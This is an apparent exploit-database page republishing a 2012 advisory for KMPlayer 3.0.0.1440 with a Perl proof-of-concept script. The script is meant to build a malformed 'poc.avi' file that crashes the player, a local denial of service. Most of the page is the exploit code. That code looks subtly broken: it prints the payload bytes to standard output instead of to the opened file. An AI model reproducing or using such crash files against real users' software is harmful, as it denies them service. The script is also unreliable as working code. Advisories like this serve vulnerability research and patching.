KMPlayer 3.0.0.1440 – ‘.avi’ File Local Denial of Service

  • 作者: Am!r
    日期: 2012-10-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/37984/
  • source: https://www.securityfocus.com/bid/56322/info
    
    KMPlayer is prone to a local denial-of-service vulnerability.
    
    An local attacker can exploit this issue to crash the affected application, denying service to legitimate users.
    
    KMPlayer 3.0.0.1440 is vulnerable; other versions may also be affected. 
    
    #!/usr/bin/perl
    #Title : KmPlayer v3.0.0.1440 Local Crash PoC
    #Discovered By : Am!r
    #Home : http://IrIsT.Ir/forum/
    #tested : XP
    #TNX : Alireza , C0dex , B3hz4d
    
    my $po="\x46\x02\x00\x00";
    
    open(C, ">:raw", "poc.avi");
    
    print $po;
    
    close(C);